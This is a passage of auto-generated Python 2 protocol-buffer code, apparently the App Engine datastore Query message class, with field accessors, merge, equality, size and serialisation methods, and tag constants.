  def set_hint(self, x):
    self.has_hint_ = 1
    self.hint_ = x

  def clear_hint(self):
    if self.has_hint_:
      self.has_hint_ = 0
      self.hint_ = 0

  def has_hint(self): return self.has_hint_

  def count(self): return self.count_

  def set_count(self, x):
    self.has_count_ = 1
    self.count_ = x

  def clear_count(self):
    if self.has_count_:
      self.has_count_ = 0
      self.count_ = 0

  def has_count(self): return self.has_count_

  def offset(self): return self.offset_

  def set_offset(self, x):
    self.has_offset_ = 1
    self.offset_ = x

  def clear_offset(self):
    if self.has_offset_:
      self.has_offset_ = 0
      self.offset_ = 0

  def has_offset(self): return self.has_offset_

  def limit(self): return self.limit_

  def set_limit(self, x):
    self.has_limit_ = 1
    self.limit_ = x

  def clear_limit(self):
    if self.has_limit_:
      self.has_limit_ = 0
      self.limit_ = 0

  def has_limit(self): return self.has_limit_

  def compiled_cursor(self):
    if self.compiled_cursor_ is None:
      self.lazy_init_lock_.acquire()
      try:
        if self.compiled_cursor_ is None: self.compiled_cursor_ = CompiledCursor()
      finally:
        self.lazy_init_lock_.release()
    return self.compiled_cursor_

  def mutable_compiled_cursor(self): self.has_compiled_cursor_ = 1; return self.compiled_cursor()

  def clear_compiled_cursor(self):

    if self.has_compiled_cursor_:
      self.has_compiled_cursor_ = 0;
      if self.compiled_cursor_ is not None: self.compiled_cursor_.Clear()

  def has_compiled_cursor(self): return self.has_compiled_cursor_

  def end_compiled_cursor(self):
    if self.end_compiled_cursor_ is None:
      self.lazy_init_lock_.acquire()
      try:
        if self.end_compiled_cursor_ is None: self.end_compiled_cursor_ = CompiledCursor()
      finally:
        self.lazy_init_lock_.release()
    return self.end_compiled_cursor_

  def mutable_end_compiled_cursor(self): self.has_end_compiled_cursor_ = 1; return self.end_compiled_cursor()

  def clear_end_compiled_cursor(self):

    if self.has_end_compiled_cursor_:
      self.has_end_compiled_cursor_ = 0;
      if self.end_compiled_cursor_ is not None: self.end_compiled_cursor_.Clear()

  def has_end_compiled_cursor(self): return self.has_end_compiled_cursor_

  def composite_index_size(self): return len(self.composite_index_)
  def composite_index_list(self): return self.composite_index_

  def composite_index(self, i):
    return self.composite_index_[i]

  def mutable_composite_index(self, i):
    return self.composite_index_[i]

  def add_composite_index(self):
    x = CompositeIndex()
    self.composite_index_.append(x)
    return x

  def clear_composite_index(self):
    self.composite_index_ = []
  def require_perfect_plan(self): return self.require_perfect_plan_

  def set_require_perfect_plan(self, x):
    self.has_require_perfect_plan_ = 1
    self.require_perfect_plan_ = x

  def clear_require_perfect_plan(self):
    if self.has_require_perfect_plan_:
      self.has_require_perfect_plan_ = 0
      self.require_perfect_plan_ = 0

  def has_require_perfect_plan(self): return self.has_require_perfect_plan_

  def keys_only(self): return self.keys_only_

  def set_keys_only(self, x):
    self.has_keys_only_ = 1
    self.keys_only_ = x

  def clear_keys_only(self):
    if self.has_keys_only_:
      self.has_keys_only_ = 0
      self.keys_only_ = 0

  def has_keys_only(self): return self.has_keys_only_

  def transaction(self):
    if self.transaction_ is None:
      self.lazy_init_lock_.acquire()
      try:
        if self.transaction_ is None: self.transaction_ = Transaction()
      finally:
        self.lazy_init_lock_.release()
    return self.transaction_

  def mutable_transaction(self): self.has_transaction_ = 1; return self.transaction()

  def clear_transaction(self):

    if self.has_transaction_:
      self.has_transaction_ = 0;
      if self.transaction_ is not None: self.transaction_.Clear()

  def has_transaction(self): return self.has_transaction_

  def compile(self): return self.compile_

  def set_compile(self, x):
    self.has_compile_ = 1
    self.compile_ = x

  def clear_compile(self):
    if self.has_compile_:
      self.has_compile_ = 0
      self.compile_ = 0

  def has_compile(self): return self.has_compile_

  def failover_ms(self): return self.failover_ms_

  def set_failover_ms(self, x):
    self.has_failover_ms_ = 1
    self.failover_ms_ = x

  def clear_failover_ms(self):
    if self.has_failover_ms_:
      self.has_failover_ms_ = 0
      self.failover_ms_ = 0

  def has_failover_ms(self): return self.has_failover_ms_

  def strong(self): return self.strong_

  def set_strong(self, x):
    self.has_strong_ = 1
    self.strong_ = x

  def clear_strong(self):
    if self.has_strong_:
      self.has_strong_ = 0
      self.strong_ = 0

  def has_strong(self): return self.has_strong_

  def property_name_size(self): return len(self.property_name_)
  def property_name_list(self): return self.property_name_

  def property_name(self, i):
    return self.property_name_[i]

  def set_property_name(self, i, x):
    self.property_name_[i] = x

  def add_property_name(self, x):
    self.property_name_.append(x)

  def clear_property_name(self):
    self.property_name_ = []

  def group_by_property_name_size(self): return len(self.group_by_property_name_)
  def group_by_property_name_list(self): return self.group_by_property_name_

  def group_by_property_name(self, i):
    return self.group_by_property_name_[i]

  def set_group_by_property_name(self, i, x):
    self.group_by_property_name_[i] = x

  def add_group_by_property_name(self, x):
    self.group_by_property_name_.append(x)

  def clear_group_by_property_name(self):
    self.group_by_property_name_ = []

  def distinct(self): return self.distinct_

  def set_distinct(self, x):
    self.has_distinct_ = 1
    self.distinct_ = x

  def clear_distinct(self):
    if self.has_distinct_:
      self.has_distinct_ = 0
      self.distinct_ = 0

  def has_distinct(self): return self.has_distinct_

  def min_safe_time_seconds(self): return self.min_safe_time_seconds_

  def set_min_safe_time_seconds(self, x):
    self.has_min_safe_time_seconds_ = 1
    self.min_safe_time_seconds_ = x

  def clear_min_safe_time_seconds(self):
    if self.has_min_safe_time_seconds_:
      self.has_min_safe_time_seconds_ = 0
      self.min_safe_time_seconds_ = 0

  def has_min_safe_time_seconds(self): return self.has_min_safe_time_seconds_

  def safe_replica_name_size(self): return len(self.safe_replica_name_)
  def safe_replica_name_list(self): return self.safe_replica_name_

  def safe_replica_name(self, i):
    return self.safe_replica_name_[i]

  def set_safe_replica_name(self, i, x):
    self.safe_replica_name_[i] = x

  def add_safe_replica_name(self, x):
    self.safe_replica_name_.append(x)

  def clear_safe_replica_name(self):
    self.safe_replica_name_ = []

  def persist_offset(self): return self.persist_offset_

  def set_persist_offset(self, x):
    self.has_persist_offset_ = 1
    self.persist_offset_ = x

  def clear_persist_offset(self):
    if self.has_persist_offset_:
      self.has_persist_offset_ = 0
      self.persist_offset_ = 1

  def has_persist_offset(self): return self.has_persist_offset_


  def MergeFrom(self, x):
    assert x is not self
    if (x.has_header()): self.mutable_header().MergeFrom(x.header())
    if (x.has_app()): self.set_app(x.app())
    if (x.has_name_space()): self.set_name_space(x.name_space())
    if (x.has_kind()): self.set_kind(x.kind())
    if (x.has_ancestor()): self.mutable_ancestor().MergeFrom(x.ancestor())
    for i in xrange(x.filter_size()): self.add_filter().CopyFrom(x.filter(i))
    if (x.has_search_query()): self.set_search_query(x.search_query())
    for i in xrange(x.order_size()): self.add_order().CopyFrom(x.order(i))
    if (x.has_hint()): self.set_hint(x.hint())
    if (x.has_count()): self.set_count(x.count())
    if (x.has_offset()): self.set_offset(x.offset())
    if (x.has_limit()): self.set_limit(x.limit())
    if (x.has_compiled_cursor()): self.mutable_compiled_cursor().MergeFrom(x.compiled_cursor())
    if (x.has_end_compiled_cursor()): self.mutable_end_compiled_cursor().MergeFrom(x.end_compiled_cursor())
    for i in xrange(x.composite_index_size()): self.add_composite_index().CopyFrom(x.composite_index(i))
    if (x.has_require_perfect_plan()): self.set_require_perfect_plan(x.require_perfect_plan())
    if (x.has_keys_only()): self.set_keys_only(x.keys_only())
    if (x.has_transaction()): self.mutable_transaction().MergeFrom(x.transaction())
    if (x.has_compile()): self.set_compile(x.compile())
    if (x.has_failover_ms()): self.set_failover_ms(x.failover_ms())
    if (x.has_strong()): self.set_strong(x.strong())
    for i in xrange(x.property_name_size()): self.add_property_name(x.property_name(i))
    for i in xrange(x.group_by_property_name_size()): self.add_group_by_property_name(x.group_by_property_name(i))
    if (x.has_distinct()): self.set_distinct(x.distinct())
    if (x.has_min_safe_time_seconds()): self.set_min_safe_time_seconds(x.min_safe_time_seconds())
    for i in xrange(x.safe_replica_name_size()): self.add_safe_replica_name(x.safe_replica_name(i))
    if (x.has_persist_offset()): self.set_persist_offset(x.persist_offset())

  def Equals(self, x):
    if x is self: return 1
    if self.has_header_ != x.has_header_: return 0
    if self.has_header_ and self.header_ != x.header_: return 0
    if self.has_app_ != x.has_app_: return 0
    if self.has_app_ and self.app_ != x.app_: return 0
    if self.has_name_space_ != x.has_name_space_: return 0
    if self.has_name_space_ and self.name_space_ != x.name_space_: return 0
    if self.has_kind_ != x.has_kind_: return 0
    if self.has_kind_ and self.kind_ != x.kind_: return 0
    if self.has_ancestor_ != x.has_ancestor_: return 0
    if self.has_ancestor_ and self.ancestor_ != x.ancestor_: return 0
    if len(self.filter_) != len(x.filter_): return 0
    for e1, e2 in zip(self.filter_, x.filter_):
      if e1 != e2: return 0
    if self.has_search_query_ != x.has_search_query_: return 0
    if self.has_search_query_ and self.search_query_ != x.search_query_: return 0
    if len(self.order_) != len(x.order_): return 0
    for e1, e2 in zip(self.order_, x.order_):
      if e1 != e2: return 0
    if self.has_hint_ != x.has_hint_: return 0
    if self.has_hint_ and self.hint_ != x.hint_: return 0
    if self.has_count_ != x.has_count_: return 0
    if self.has_count_ and self.count_ != x.count_: return 0
    if self.has_offset_ != x.has_offset_: return 0
    if self.has_offset_ and self.offset_ != x.offset_: return 0
    if self.has_limit_ != x.has_limit_: return 0
    if self.has_limit_ and self.limit_ != x.limit_: return 0
    if self.has_compiled_cursor_ != x.has_compiled_cursor_: return 0
    if self.has_compiled_cursor_ and self.compiled_cursor_ != x.compiled_cursor_: return 0
    if self.has_end_compiled_cursor_ != x.has_end_compiled_cursor_: return 0
    if self.has_end_compiled_cursor_ and self.end_compiled_cursor_ != x.end_compiled_cursor_: return 0
    if len(self.composite_index_) != len(x.composite_index_): return 0
    for e1, e2 in zip(self.composite_index_, x.composite_index_):
      if e1 != e2: return 0
    if self.has_require_perfect_plan_ != x.has_require_perfect_plan_: return 0
    if self.has_require_perfect_plan_ and self.require_perfect_plan_ != x.require_perfect_plan_: return 0
    if self.has_keys_only_ != x.has_keys_only_: return 0
    if self.has_keys_only_ and self.keys_only_ != x.keys_only_: return 0
    if self.has_transaction_ != x.has_transaction_: return 0
    if self.has_transaction_ and self.transaction_ != x.transaction_: return 0
    if self.has_compile_ != x.has_compile_: return 0
    if self.has_compile_ and self.compile_ != x.compile_: return 0
    if self.has_failover_ms_ != x.has_failover_ms_: return 0
    if self.has_failover_ms_ and self.failover_ms_ != x.failover_ms_: return 0
    if self.has_strong_ != x.has_strong_: return 0
    if self.has_strong_ and self.strong_ != x.strong_: return 0
    if len(self.property_name_) != len(x.property_name_): return 0
    for e1, e2 in zip(self.property_name_, x.property_name_):
      if e1 != e2: return 0
    if len(self.group_by_property_name_) != len(x.group_by_property_name_): return 0
    for e1, e2 in zip(self.group_by_property_name_, x.group_by_property_name_):
      if e1 != e2: return 0
    if self.has_distinct_ != x.has_distinct_: return 0
    if self.has_distinct_ and self.distinct_ != x.distinct_: return 0
    if self.has_min_safe_time_seconds_ != x.has_min_safe_time_seconds_: return 0
    if self.has_min_safe_time_seconds_ and self.min_safe_time_seconds_ != x.min_safe_time_seconds_: return 0
    if len(self.safe_replica_name_) != len(x.safe_replica_name_): return 0
    for e1, e2 in zip(self.safe_replica_name_, x.safe_replica_name_):
      if e1 != e2: return 0
    if self.has_persist_offset_ != x.has_persist_offset_: return 0
    if self.has_persist_offset_ and self.persist_offset_ != x.persist_offset_: return 0
    return 1

  def IsInitialized(self, debug_strs=None):
    initialized = 1
    if (self.has_header_ and not self.header_.IsInitialized(debug_strs)): initialized = 0
    if (not self.has_app_):
      initialized = 0
      if debug_strs is not None:
        debug_strs.append('Required field: app not set.')
    if (self.has_ancestor_ and not self.ancestor_.IsInitialized(debug_strs)): initialized = 0
    for p in self.filter_:
      if not p.IsInitialized(debug_strs): initialized=0
    for p in self.order_:
      if not p.IsInitialized(debug_strs): initialized=0
    if (self.has_compiled_cursor_ and not self.compiled_cursor_.IsInitialized(debug_strs)): initialized = 0
    if (self.has_end_compiled_cursor_ and not self.end_compiled_cursor_.IsInitialized(debug_strs)): initialized = 0
    for p in self.composite_index_:
      if not p.IsInitialized(debug_strs): initialized=0
    if (self.has_transaction_ and not self.transaction_.IsInitialized(debug_strs)): initialized = 0
    return initialized

  def ByteSize(self):
    n = 0
    if (self.has_header_): n += 2 + self.lengthString(self.header_.ByteSize())
    n += self.lengthString(len(self.app_))
    if (self.has_name_space_): n += 2 + self.lengthString(len(self.name_space_))
    if (self.has_kind_): n += 1 + self.lengthString(len(self.kind_))
    if (self.has_ancestor_): n += 2 + self.lengthString(self.ancestor_.ByteSize())
    n += 2 * len(self.filter_)
    for i in xrange(len(self.filter_)): n += self.filter_[i].ByteSize()
    if (self.has_search_query_): n += 1 + self.lengthString(len(self.search_query_))
    n += 2 * len(self.order_)
    for i in xrange(len(self.order_)): n += self.order_[i].ByteSize()
    if (self.has_hint_): n += 2 + self.lengthVarInt64(self.hint_)
    if (self.has_count_): n += 2 + self.lengthVarInt64(self.count_)
    if (self.has_offset_): n += 1 + self.lengthVarInt64(self.offset_)
    if (self.has_limit_): n += 2 + self.lengthVarInt64(self.limit_)
    if (self.has_compiled_cursor_): n += 2 + self.lengthString(self.compiled_cursor_.ByteSize())
    if (self.has_end_compiled_cursor_): n += 2 + self.lengthString(self.end_compiled_cursor_.ByteSize())
    n += 2 * len(self.composite_index_)
    for i in xrange(len(self.composite_index_)): n += self.lengthString(self.composite_index_[i].ByteSize())
    if (self.has_require_perfect_plan_): n += 3
    if (self.has_keys_only_): n += 3
    if (self.has_transaction_): n += 2 + self.lengthString(self.transaction_.ByteSize())
    if (self.has_compile_): n += 3
    if (self.has_failover_ms_): n += 2 + self.lengthVarInt64(self.failover_ms_)
    if (self.has_strong_): n += 3
    n += 2 * len(self.property_name_)
    for i in xrange(len(self.property_name_)): n += self.lengthString(len(self.property_name_[i]))
    n += 2 * len(self.group_by_property_name_)
    for i in xrange(len(self.group_by_property_name_)): n += self.lengthString(len(self.group_by_property_name_[i]))
    if (self.has_distinct_): n += 3
    if (self.has_min_safe_time_seconds_): n += 2 + self.lengthVarInt64(self.min_safe_time_seconds_)
    n += 2 * len(self.safe_replica_name_)
    for i in xrange(len(self.safe_replica_name_)): n += self.lengthString(len(self.safe_replica_name_[i]))
    if (self.has_persist_offset_): n += 3
    return n + 1

  def ByteSizePartial(self):
    n = 0
    if (self.has_header_): n += 2 + self.lengthString(self.header_.ByteSizePartial())
    if (self.has_app_):
      n += 1
      n += self.lengthString(len(self.app_))
    if (self.has_name_space_): n += 2 + self.lengthString(len(self.name_space_))
    if (self.has_kind_): n += 1 + self.lengthString(len(self.kind_))
    if (self.has_ancestor_): n += 2 + self.lengthString(self.ancestor_.ByteSizePartial())
    n += 2 * len(self.filter_)
    for i in xrange(len(self.filter_)): n += self.filter_[i].ByteSizePartial()
    if (self.has_search_query_): n += 1 + self.lengthString(len(self.search_query_))
    n += 2 * len(self.order_)
    for i in xrange(len(self.order_)): n += self.order_[i].ByteSizePartial()
    if (self.has_hint_): n += 2 + self.lengthVarInt64(self.hint_)
    if (self.has_count_): n += 2 + self.lengthVarInt64(self.count_)
    if (self.has_offset_): n += 1 + self.lengthVarInt64(self.offset_)
    if (self.has_limit_): n += 2 + self.lengthVarInt64(self.limit_)
    if (self.has_compiled_cursor_): n += 2 + self.lengthString(self.compiled_cursor_.ByteSizePartial())
    if (self.has_end_compiled_cursor_): n += 2 + self.lengthString(self.end_compiled_cursor_.ByteSizePartial())
    n += 2 * len(self.composite_index_)
    for i in xrange(len(self.composite_index_)): n += self.lengthString(self.composite_index_[i].ByteSizePartial())
    if (self.has_require_perfect_plan_): n += 3
    if (self.has_keys_only_): n += 3
    if (self.has_transaction_): n += 2 + self.lengthString(self.transaction_.ByteSizePartial())
    if (self.has_compile_): n += 3
    if (self.has_failover_ms_): n += 2 + self.lengthVarInt64(self.failover_ms_)
    if (self.has_strong_): n += 3
    n += 2 * len(self.property_name_)
    for i in xrange(len(self.property_name_)): n += self.lengthString(len(self.property_name_[i]))
    n += 2 * len(self.group_by_property_name_)
    for i in xrange(len(self.group_by_property_name_)): n += self.lengthString(len(self.group_by_property_name_[i]))
    if (self.has_distinct_): n += 3
    if (self.has_min_safe_time_seconds_): n += 2 + self.lengthVarInt64(self.min_safe_time_seconds_)
    n += 2 * len(self.safe_replica_name_)
    for i in xrange(len(self.safe_replica_name_)): n += self.lengthString(len(self.safe_replica_name_[i]))
    if (self.has_persist_offset_): n += 3
    return n

  def Clear(self):
    self.clear_header()
    self.clear_app()
    self.clear_name_space()
    self.clear_kind()
    self.clear_ancestor()
    self.clear_filter()
    self.clear_search_query()
    self.clear_order()
    self.clear_hint()
    self.clear_count()
    self.clear_offset()
    self.clear_limit()
    self.clear_compiled_cursor()
    self.clear_end_compiled_cursor()
    self.clear_composite_index()
    self.clear_require_perfect_plan()
    self.clear_keys_only()
    self.clear_transaction()
    self.clear_compile()
    self.clear_failover_ms()
    self.clear_strong()
    self.clear_property_name()
    self.clear_group_by_property_name()
    self.clear_distinct()
    self.clear_min_safe_time_seconds()
    self.clear_safe_replica_name()
    self.clear_persist_offset()

  def OutputUnchecked(self, out):
    out.putVarInt32(10)
    out.putPrefixedString(self.app_)
    if (self.has_kind_):
      out.putVarInt32(26)
      out.putPrefixedString(self.kind_)
    for i in xrange(len(self.filter_)):
      out.putVarInt32(35)
      self.filter_[i].OutputUnchecked(out)
      out.putVarInt32(36)
    if (self.has_search_query_):
      out.putVarInt32(66)
      out.putPrefixedString(self.search_query_)
    for i in xrange(len(self.order_)):
      out.putVarInt32(75)
      self.order_[i].OutputUnchecked(out)
      out.putVarInt32(76)
    if (self.has_offset_):
      out.putVarInt32(96)
      out.putVarInt32(self.offset_)
    if (self.has_limit_):
      out.putVarInt32(128)
      out.putVarInt32(self.limit_)
    if (self.has_ancestor_):
      out.putVarInt32(138)
      out.putVarInt32(self.ancestor_.ByteSize())
      self.ancestor_.OutputUnchecked(out)
    if (self.has_hint_):
      out.putVarInt32(144)
      out.putVarInt32(self.hint_)
    for i in xrange(len(self.composite_index_)):
      out.putVarInt32(154)
      out.putVarInt32(self.composite_index_[i].ByteSize())
      self.composite_index_[i].OutputUnchecked(out)
    if (self.has_require_perfect_plan_):
      out.putVarInt32(160)
      out.putBoolean(self.require_perfect_plan_)
    if (self.has_keys_only_):
      out.putVarInt32(168)
      out.putBoolean(self.keys_only_)
    if (self.has_transaction_):
      out.putVarInt32(178)
      out.putVarInt32(self.transaction_.ByteSize())
      self.transaction_.OutputUnchecked(out)
    if (self.has_count_):
      out.putVarInt32(184)
      out.putVarInt32(self.count_)
    if (self.has_distinct_):
      out.putVarInt32(192)
      out.putBoolean(self.distinct_)
    if (self.has_compile_):
      out.putVarInt32(200)
      out.putBoolean(self.compile_)
    if (self.has_failover_ms_):
      out.putVarInt32(208)
      out.putVarInt64(self.failover_ms_)
    if (self.has_name_space_):
      out.putVarInt32(234)
      out.putPrefixedString(self.name_space_)
    if (self.has_compiled_cursor_):
      out.putVarInt32(242)
      out.putVarInt32(self.compiled_cursor_.ByteSize())
      self.compiled_cursor_.OutputUnchecked(out)
    if (self.has_end_compiled_cursor_):
      out.putVarInt32(250)
      out.putVarInt32(self.end_compiled_cursor_.ByteSize())
      self.end_compiled_cursor_.OutputUnchecked(out)
    if (self.has_strong_):
      out.putVarInt32(256)
      out.putBoolean(self.strong_)
    for i in xrange(len(self.property_name_)):
      out.putVarInt32(266)
      out.putPrefixedString(self.property_name_[i])
    for i in xrange(len(self.group_by_property_name_)):
      out.putVarInt32(274)
      out.putPrefixedString(self.group_by_property_name_[i])
    if (self.has_min_safe_time_seconds_):
      out.putVarInt32(280)
      out.putVarInt64(self.min_safe_time_seconds_)
    for i in xrange(len(self.safe_replica_name_)):
      out.putVarInt32(290)
      out.putPrefixedString(self.safe_replica_name_[i])
    if (self.has_persist_offset_):
      out.putVarInt32(296)
      out.putBoolean(self.persist_offset_)
    if (self.has_header_):
      out.putVarInt32(314)
      out.putVarInt32(self.header_.ByteSize())
      self.header_.OutputUnchecked(out)

  def OutputPartial(self, out):
    if (self.has_app_):
      out.putVarInt32(10)
      out.putPrefixedString(self.app_)
    if (self.has_kind_):
      out.putVarInt32(26)
      out.putPrefixedString(self.kind_)
    for i in xrange(len(self.filter_)):
      out.putVarInt32(35)
      self.filter_[i].OutputPartial(out)
      out.putVarInt32(36)
    if (self.has_search_query_):
      out.putVarInt32(66)
      out.putPrefixedString(self.search_query_)
    for i in xrange(len(self.order_)):
      out.putVarInt32(75)
      self.order_[i].OutputPartial(out)
      out.putVarInt32(76)
    if (self.has_offset_):
      out.putVarInt32(96)
      out.putVarInt32(self.offset_)
    if (self.has_limit_):
      out.putVarInt32(128)
      out.putVarInt32(self.limit_)
    if (self.has_ancestor_):
      out.putVarInt32(138)
      out.putVarInt32(self.ancestor_.ByteSizePartial())
      self.ancestor_.OutputPartial(out)
    if (self.has_hint_):
      out.putVarInt32(144)
      out.putVarInt32(self.hint_)
    for i in xrange(len(self.composite_index_)):
      out.putVarInt32(154)
      out.putVarInt32(self.composite_index_[i].ByteSizePartial())
      self.composite_index_[i].OutputPartial(out)
    if (self.has_require_perfect_plan_):
      out.putVarInt32(160)
      out.putBoolean(self.require_perfect_plan_)
    if (self.has_keys_only_):
      out.putVarInt32(168)
      out.putBoolean(self.keys_only_)
    if (self.has_transaction_):
      out.putVarInt32(178)
      out.putVarInt32(self.transaction_.ByteSizePartial())
      self.transaction_.OutputPartial(out)
    if (self.has_count_):
      out.putVarInt32(184)
      out.putVarInt32(self.count_)
    if (self.has_distinct_):
      out.putVarInt32(192)
      out.putBoolean(self.distinct_)
    if (self.has_compile_):
      out.putVarInt32(200)
      out.putBoolean(self.compile_)
    if (self.has_failover_ms_):
      out.putVarInt32(208)
      out.putVarInt64(self.failover_ms_)
    if (self.has_name_space_):
      out.putVarInt32(234)
      out.putPrefixedString(self.name_space_)
    if (self.has_compiled_cursor_):
      out.putVarInt32(242)
      out.putVarInt32(self.compiled_cursor_.ByteSizePartial())
      self.compiled_cursor_.OutputPartial(out)
    if (self.has_end_compiled_cursor_):
      out.putVarInt32(250)
      out.putVarInt32(self.end_compiled_cursor_.ByteSizePartial())
      self.end_compiled_cursor_.OutputPartial(out)
    if (self.has_strong_):
      out.putVarInt32(256)
      out.putBoolean(self.strong_)
    for i in xrange(len(self.property_name_)):
      out.putVarInt32(266)
      out.putPrefixedString(self.property_name_[i])
    for i in xrange(len(self.group_by_property_name_)):
      out.putVarInt32(274)
      out.putPrefixedString(self.group_by_property_name_[i])
    if (self.has_min_safe_time_seconds_):
      out.putVarInt32(280)
      out.putVarInt64(self.min_safe_time_seconds_)
    for i in xrange(len(self.safe_replica_name_)):
      out.putVarInt32(290)
      out.putPrefixedString(self.safe_replica_name_[i])
    if (self.has_persist_offset_):
      out.putVarInt32(296)
      out.putBoolean(self.persist_offset_)
    if (self.has_header_):
      out.putVarInt32(314)
      out.putVarInt32(self.header_.ByteSizePartial())
      self.header_.OutputPartial(out)

  def TryMerge(self, d):
    while d.avail() > 0:
      tt = d.getVarInt32()
      if tt == 10:
        self.set_app(d.getPrefixedString())
        continue
      if tt == 26:
        self.set_kind(d.getPrefixedString())
        continue
      if tt == 35:
        self.add_filter().TryMerge(d)
        continue
      if tt == 66:
        self.set_search_query(d.getPrefixedString())
        continue
      if tt == 75:
        self.add_order().TryMerge(d)
        continue
      if tt == 96:
        self.set_offset(d.getVarInt32())
        continue
      if tt == 128:
        self.set_limit(d.getVarInt32())
        continue
      if tt == 138:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.mutable_ancestor().TryMerge(tmp)
        continue
      if tt == 144:
        self.set_hint(d.getVarInt32())
        continue
      if tt == 154:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.add_composite_index().TryMerge(tmp)
        continue
      if tt == 160:
        self.set_require_perfect_plan(d.getBoolean())
        continue
      if tt == 168:
        self.set_keys_only(d.getBoolean())
        continue
      if tt == 178:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.mutable_transaction().TryMerge(tmp)
        continue
      if tt == 184:
        self.set_count(d.getVarInt32())
        continue
      if tt == 192:
        self.set_distinct(d.getBoolean())
        continue
      if tt == 200:
        self.set_compile(d.getBoolean())
        continue
      if tt == 208:
        self.set_failover_ms(d.getVarInt64())
        continue
      if tt == 234:
        self.set_name_space(d.getPrefixedString())
        continue
      if tt == 242:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.mutable_compiled_cursor().TryMerge(tmp)
        continue
      if tt == 250:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.mutable_end_compiled_cursor().TryMerge(tmp)
        continue
      if tt == 256:
        self.set_strong(d.getBoolean())
        continue
      if tt == 266:
        self.add_property_name(d.getPrefixedString())
        continue
      if tt == 274:
        self.add_group_by_property_name(d.getPrefixedString())
        continue
      if tt == 280:
        self.set_min_safe_time_seconds(d.getVarInt64())
        continue
      if tt == 290:
        self.add_safe_replica_name(d.getPrefixedString())
        continue
      if tt == 296:
        self.set_persist_offset(d.getBoolean())
        continue
      if tt == 314:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.mutable_header().TryMerge(tmp)
        continue


      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)


  def __str__(self, prefix="", printElemNumber=0):
    res=""
    if self.has_header_:
      res+=prefix+"header <\n"
      res+=self.header_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
    if self.has_app_: res+=prefix+("app: %s\n" % self.DebugFormatString(self.app_))
    if self.has_name_space_: res+=prefix+("name_space: %s\n" % self.DebugFormatString(self.name_space_))
    if self.has_kind_: res+=prefix+("kind: %s\n" % self.DebugFormatString(self.kind_))
    if self.has_ancestor_:
      res+=prefix+"ancestor <\n"
      res+=self.ancestor_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
    cnt=0
    for e in self.filter_:
      elm=""
      if printElemNumber: elm="(%d)" % cnt
      res+=prefix+("Filter%s {\n" % elm)
      res+=e.__str__(prefix + "  ", printElemNumber)
      res+=prefix+"}\n"
      cnt+=1
    if self.has_search_query_: res+=prefix+("search_query: %s\n" % self.DebugFormatString(self.search_query_))
    cnt=0
    for e in self.order_:
      elm=""
      if printElemNumber: elm="(%d)" % cnt
      res+=prefix+("Order%s {\n" % elm)
      res+=e.__str__(prefix + "  ", printElemNumber)
      res+=prefix+"}\n"
      cnt+=1
    if self.has_hint_: res+=prefix+("hint: %s\n" % self.DebugFormatInt32(self.hint_))
    if self.has_count_: res+=prefix+("count: %s\n" % self.DebugFormatInt32(self.count_))
    if self.has_offset_: res+=prefix+("offset: %s\n" % self.DebugFormatInt32(self.offset_))
    if self.has_limit_: res+=prefix+("limit: %s\n" % self.DebugFormatInt32(self.limit_))
    if self.has_compiled_cursor_:
      res+=prefix+"compiled_cursor <\n"
      res+=self.compiled_cursor_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
    if self.has_end_compiled_cursor_:
      res+=prefix+"end_compiled_cursor <\n"
      res+=self.end_compiled_cursor_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
    cnt=0
    for e in self.composite_index_:
      elm=""
      if printElemNumber: elm="(%d)" % cnt
      res+=prefix+("composite_index%s <\n" % elm)
      res+=e.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
      cnt+=1
    if self.has_require_perfect_plan_: res+=prefix+("require_perfect_plan: %s\n" % self.DebugFormatBool(self.require_perfect_plan_))
    if self.has_keys_only_: res+=prefix+("keys_only: %s\n" % self.DebugFormatBool(self.keys_only_))
    if self.has_transaction_:
      res+=prefix+"transaction <\n"
      res+=self.transaction_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
    if self.has_compile_: res+=prefix+("compile: %s\n" % self.DebugFormatBool(self.compile_))
    if self.has_failover_ms_: res+=prefix+("failover_ms: %s\n" % self.DebugFormatInt64(self.failover_ms_))
    if self.has_strong_: res+=prefix+("strong: %s\n" % self.DebugFormatBool(self.strong_))
    cnt=0
    for e in self.property_name_:
      elm=""
      if printElemNumber: elm="(%d)" % cnt
      res+=prefix+("property_name%s: %s\n" % (elm, self.DebugFormatString(e)))
      cnt+=1
    cnt=0
    for e in self.group_by_property_name_:
      elm=""
      if printElemNumber: elm="(%d)" % cnt
      res+=prefix+("group_by_property_name%s: %s\n" % (elm, self.DebugFormatString(e)))
      cnt+=1
    if self.has_distinct_: res+=prefix+("distinct: %s\n" % self.DebugFormatBool(self.distinct_))
    if self.has_min_safe_time_seconds_: res+=prefix+("min_safe_time_seconds: %s\n" % self.DebugFormatInt64(self.min_safe_time_seconds_))
    cnt=0
    for e in self.safe_replica_name_:
      elm=""
      if printElemNumber: elm="(%d)" % cnt
      res+=prefix+("safe_replica_name%s: %s\n" % (elm, self.DebugFormatString(e)))
      cnt+=1
    if self.has_persist_offset_: res+=prefix+("persist_offset: %s\n" % self.DebugFormatBool(self.persist_offset_))
    return res


  def _BuildTagLookupTable(sparse, maxtag, default=None):
    return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])

  kheader = 39
  kapp = 1
  kname_space = 29
  kkind = 3
  kancestor = 17
  kFilterGroup = 4
  kFilterop = 6
  kFilterproperty = 14
  ksearch_query = 8
  kOrderGroup = 9
  kOrderproperty = 10
  kOrderdirection = 11
  khint = 18
  kcount = 23
